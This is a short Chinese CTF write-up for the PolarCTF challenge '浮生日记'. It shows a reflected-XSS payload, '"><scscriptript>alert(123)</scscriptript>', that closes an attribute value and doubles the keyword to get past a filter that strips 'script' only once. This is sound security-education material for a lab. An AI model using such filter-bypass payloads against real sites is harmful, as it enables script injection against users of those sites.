技术栈

【PolarCTF】浮生日记

大方子2026-01-24 9:25

很明显是个XSS,尝试常规语句发现会过滤script

尝试双写

复制代码
<scscriptript>alert(123)</scscriptript>

可以看到只过滤了一次<script>,但是还没有触发弹窗

我们看下源代码,发现需要对value进行闭合

那么payload如下:

复制代码
"><scscriptript>alert(123)</scscriptript>
上一篇:单片机中NVM和FLASH的区别
下一篇:现代python捉虫记——f-string调试语法字面量解析坑点追踪(python版本3.12.11)
相关推荐
一名优秀的码农
2 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp
2 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp
2 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人
2 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp
3 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo007
3 天前
渗透测试_漏洞利用
网络安全
啥都想学点
3 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ
3 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏
3 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk
3 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04OpenClaw + 飞书(Feishu)环境搭建指南05Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08Window 10部署openclaw报错node.exe : npm error code 12809AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot10OpenClaw优化飞书API 额度已耗尽问题